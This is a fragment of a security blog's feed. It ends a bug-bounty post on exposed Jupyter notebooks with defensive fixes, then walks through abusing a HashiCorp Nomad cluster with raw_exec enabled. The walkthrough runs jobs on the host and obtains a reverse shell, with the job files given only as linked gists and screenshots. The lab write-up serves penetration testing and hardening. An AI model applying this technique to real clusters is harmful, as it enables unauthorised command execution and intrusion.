href=\"https:\/\/1.bp.blogspot.com\/-oM3Hu2CtYTM\/XmxAZzhEQzI\/AAAAAAAACi8\/pdgzoCK96oY4nLb3H0fIxqt5p65xdiVYACNcBGAsYHQ\/s1600\/Screen%2BShot%2B2020-03-13%2Bat%2B10.23.57%2BPM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"728\" data-original-width=\"1230\" height=\"189\" src=\"https:\/\/1.bp.blogspot.com\/-oM3Hu2CtYTM\/XmxAZzhEQzI\/AAAAAAAACi8\/pdgzoCK96oY4nLb3H0fIxqt5p65xdiVYACNcBGAsYHQ\/s320\/Screen%2BShot%2B2020-03-13%2Bat%2B10.23.57%2BPM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EI love payments tables\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\nAlong the way I searched who this company was.\u0026nbsp;\u0026nbsp;\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia\"\u003Ehttps:\/\/en.wikipedia.org\/wiki\/Tokopedia\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nMost interestingly...\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003EIn 2017, Tokopedia received $1.1 billion investment from Chinese e-commerce giant Alibaba.\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-7\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-7\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[7]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Again in 2018, the company secured $1.1 billion funding round led by Chinese e-commerce giant\u0026nbsp;\u003C\/span\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Alibaba_Group\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"Alibaba Group\"\u003EAlibaba Group\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Holding and Japan's\u0026nbsp;\u003C\/span\u003E\u003Ca class=\"mw-redirect\" href=\"https:\/\/en.wikipedia.org\/wiki\/SoftBank\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"SoftBank\"\u003ESoftBank\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Group\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-8\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-8\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[8]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;putting its valuation to about $7B.\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-9\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-9\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[9]\u003C\/a\u003E\u003C\/sup\u003E\u003C\/blockquote\u003E\nSo being a good person (tm) I reported the issue and it was assigned a critical severity. The fixed it super quickly and the team was decently responsive until it was fixed. After that it took 2 weeks to get information on the bounty, I promptly provided payment info, but I was never paid and they have stopped responding to my inquiries.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cb\u003ESolutions:\u003C\/b\u003E\u003Cbr \/\u003E\nRun in a limited privilege container (doesn't protect against cloud metadata attack)\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nNew versions of Juypter notebook allow for password protecting access. Do that instead of open to all"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2552988186359746960\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=2552988186359746960","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2020\/03\/what-is-your-gcp-infra-worthabout-700.html","title":"What is your GCP infra worth?...about ~$700 [Bugbounty]"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-PyPQDLHS_Hw\/XhPS4WQc57I\/AAAAAAAACgs\/Jnuy-lPZJ-4THiXklXIlzrXTc_C_9BamgCNcBGAsYHQ\/s72-c\/notebooks-main-page.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-1555777666843031796"},"published":{"$t":"2019-12-16T11:43:00.000-05:00"},"updated":{"$t":"2019-12-16T12:45:22.538-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Devoops: Nomad with raw_exec enabled"},"content":{"type":"html","$t":"\"Nomad is a flexible container orchestration tool that enables an organization to \neasily deploy and manage any containerized or legacy application using a single, \nunified workflow. Nomad can run a diverse workload of Docker, non-containerized, \nmicroservice, and batch applications, and generally offers the following benefits \nto developers and operators...\"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nfrom:\u0026nbsp;\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/index.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/index.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTo get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-lPPcT1H9GQo\/XBkZSP2G-JI\/AAAAAAAACVU\/UPTYb2jaIlMtW97fBU69pKAziQvHcHOsQCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B10.57.58%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"534\" data-original-width=\"1600\" height=\"132\" src=\"https:\/\/2.bp.blogspot.com\/-lPPcT1H9GQo\/XBkZSP2G-JI\/AAAAAAAACVU\/UPTYb2jaIlMtW97fBU69pKAziQvHcHOsQCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B10.57.58%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nI'd like to thank \u003Ca href=\"https:\/\/twitter.com\/willbtlr\" target=\"_blank\"\u003EWill Butler\u003C\/a\u003E for letting me write this up after watching him pwn it.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can get a dev environment up and running using the tutorial here:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThe walkthru has you run it as a dev environment which wont bind to 0.0.0.0 so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nserver:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\u003C\/a\u003E\u003Cbr \/\u003E\nclient1:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\u003C\/a\u003E\u003Cbr \/\u003E\nclient2:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nIf you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E$ nomad job run example.nomad\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Monitoring evaluation \"ac9b4b08\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation triggered by job \"example\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation within deployment: \"8a7dfe0f\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EAllocation \"57e65abe\" created: node \"a15034e5\", group \"cache\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation status changed: \"pending\" -\u0026gt; \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E\n\n\n\n\n\n\n\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Evaluation \"ac9b4b08\" finished with status \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-2Ftqd5bxd_8\/XBkcRWJMPEI\/AAAAAAAACVg\/WOIcbIL6uEcGLNZKeC5FaqyOzJyUQcCagCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.10.44%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"494\" data-original-width=\"1600\" height=\"122\" src=\"https:\/\/3.bp.blogspot.com\/-2Ftqd5bxd_8\/XBkcRWJMPEI\/AAAAAAAACVg\/WOIcbIL6uEcGLNZKeC5FaqyOzJyUQcCagCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.10.44%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njobs in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-LV-109rhLlQ\/XBkcRavmi9I\/AAAAAAAACVo\/EHNk9-lePrEmwvXTeVyBLL0UaSdcgwXxgCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.11.03%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"481\" data-original-width=\"1600\" height=\"120\" src=\"https:\/\/2.bp.blogspot.com\/-LV-109rhLlQ\/XBkcRavmi9I\/AAAAAAAACVo\/EHNk9-lePrEmwvXTeVyBLL0UaSdcgwXxgCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.11.03%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nservers in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-iCQH2YkYkrY\/XBkcRS1DetI\/AAAAAAAACVk\/knny4ucx7VQ_jm6V8yB8hRxOY9VL14-DwCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.10.56%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"490\" data-original-width=\"1600\" height=\"121\" src=\"https:\/\/2.bp.blogspot.com\/-iCQH2YkYkrY\/XBkcRS1DetI\/AAAAAAAACVk\/knny4ucx7VQ_jm6V8yB8hRxOY9VL14-DwCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.10.56%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nclients in the nomad UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003ELeveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nref: \u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nthe raw_exec option allow you to run a command outside isolation on the nomad host.\u0026nbsp;\u0026nbsp;\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\"The \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver can run on all supported operating systems. For security\nreasons, it is disabled by default. To enable raw exec, the Nomad client\nconfiguration must explicitly enable the \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver in the client's\n\u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/configuration\/client.html#options\" target=\"_blank\"\u003Eoptions\u003C\/a\u003E:\"\u003C\/div\u003E\n\u003Cbr \/\u003E\nHow can you see if the raw_exec module is enabled on the clients?\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can check it out it the UI:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-dy6VrEVxNi0\/XBkddoTs1bI\/AAAAAAAACV0\/8FoJT2rFHfMuZ7VMnFLCaaRw6cSxgGujQCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.16.07%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"940\" data-original-width=\"1600\" height=\"233\" src=\"https:\/\/1.bp.blogspot.com\/-dy6VrEVxNi0\/XBkddoTs1bI\/AAAAAAAACV0\/8FoJT2rFHfMuZ7VMnFLCaaRw6cSxgGujQCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.16.07%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nor by hitting the API endpoint\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-8sknh06RPxA\/XBkeaKNxzCI\/AAAAAAAACV8\/TEBdVNrEB4QSWJNGddaq7qBWkCJWzD7-gCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.19.58%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"730\" data-original-width=\"1600\" height=\"181\" src=\"https:\/\/3.bp.blogspot.com\/-8sknh06RPxA\/XBkeaKNxzCI\/AAAAAAAACV8\/TEBdVNrEB4QSWJNGddaq7qBWkCJWzD7-gCLcBGAs\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.19.58%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nLet's exploit this thing.\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nWe need to create a job hcl file with our commands. Here is gist with a simple one:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-SPCy2fNFSI4\/XBkf2207V4I\/AAAAAAAACWM\/0g4VcYRDFT4QuMaVuizi0XelReP1hxqawCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.23.36%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"240\" data-original-width=\"1600\" height=\"94\" src=\"https:\/\/2.bp.blogspot.com\/-SPCy2fNFSI4\/XBkf2207V4I\/AAAAAAAACWM\/0g4VcYRDFT4QuMaVuizi0XelReP1hxqawCLcBGAs\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.23.36%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nstarting the service\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-bPaDOXOsnZk\/XBkf2xpSSNI\/AAAAAAAACWc\/yHklCvvD_Wo9bDU1ro9rWjbfZdV8QGxWgCEwYBhgL\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.23.56%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"178\" data-original-width=\"1426\" height=\"78\" src=\"https:\/\/3.bp.blogspot.com\/-bPaDOXOsnZk\/XBkf2xpSSNI\/AAAAAAAACWc\/yHklCvvD_Wo9bDU1ro9rWjbfZdV8QGxWgCEwYBhgL\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.23.56%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nResults of our job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-myhTGqRVQHM\/XBkf3GpeGsI\/AAAAAAAACWg\/8fYgFYOFNSIu3oHfVa2pPB6lHtYxSDGnACEwYBhgL\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.26.22%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"348\" data-original-width=\"1600\" height=\"86\" src=\"https:\/\/1.bp.blogspot.com\/-myhTGqRVQHM\/XBkf3GpeGsI\/AAAAAAAACWg\/8fYgFYOFNSIu3oHfVa2pPB6lHtYxSDGnACEwYBhgL\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.26.22%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njob in the UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-CHh8Jn0GNnk\/XBkgwlcOPEI\/AAAAAAAACWk\/zkjERslCiSAaVJVz-_duc6fjEk2_DlQLgCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.27.17%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"167\" data-original-width=\"1600\" height=\"66\" src=\"https:\/\/2.bp.blogspot.com\/-CHh8Jn0GNnk\/XBkgwlcOPEI\/AAAAAAAACWk\/zkjERslCiSAaVJVz-_duc6fjEk2_DlQLgCLcBGAs\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.27.17%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nStopping the job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-I5bzwx4udqo\/XBkf2tUztRI\/AAAAAAAACWc\/6_cVfcASizMKBZvxfoIPUGi1TbwwwjNygCEwYBhgL\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.24.30%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"517\" data-original-width=\"1600\" height=\"128\" src=\"https:\/\/3.bp.blogspot.com\/-I5bzwx4udqo\/XBkf2tUztRI\/AAAAAAAACWc\/6_cVfcASizMKBZvxfoIPUGi1TbwwwjNygCEwYBhgL\/s400\/Screen%2BShot%2B2018-12-18%2Bat%2B11.24.30%2BAM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-37ubUUYo5jc\/XBkhIEzm3dI\/AAAAAAAACWs\/8OMjhAmV2_UId11MkEx5JaEgDzkpHmD0wCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.31.58%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"78\" data-original-width=\"1358\" height=\"36\" src=\"https:\/\/3.bp.blogspot.com\/-37ubUUYo5jc\/XBkhIEzm3dI\/AAAAAAAACWs\/8OMjhAmV2_UId11MkEx5JaEgDzkpHmD0wCLcBGAs\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.31.58%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nforcefully run the garbage collection\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-3up-dJkcL18\/XBkhcuBz80I\/AAAAAAAACW0\/HOtLg2Dt6Ow5rJTlxWmX8BrUy7T74XHLACLcBGAs\/s1600\/jobs-gc.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"449\" data-original-width=\"1600\" height=\"111\" src=\"https:\/\/1.bp.blogspot.com\/-3up-dJkcL18\/XBkhcuBz80I\/AAAAAAAACW0\/HOtLg2Dt6Ow5rJTlxWmX8BrUy7T74XHLACLcBGAs\/s400\/jobs-gc.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nvalidation the job was deleted\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nOK let's get a reverse shell. I used the following hcl file:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-8untVMp3n8Y\/XBkicE5U8dI\/AAAAAAAACXA\/oByKCRwUJyA2__KgMCGcGPgdQql-y23fgCLcBGAs\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.37.24%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"188\" data-original-width=\"1600\" height=\"74\" 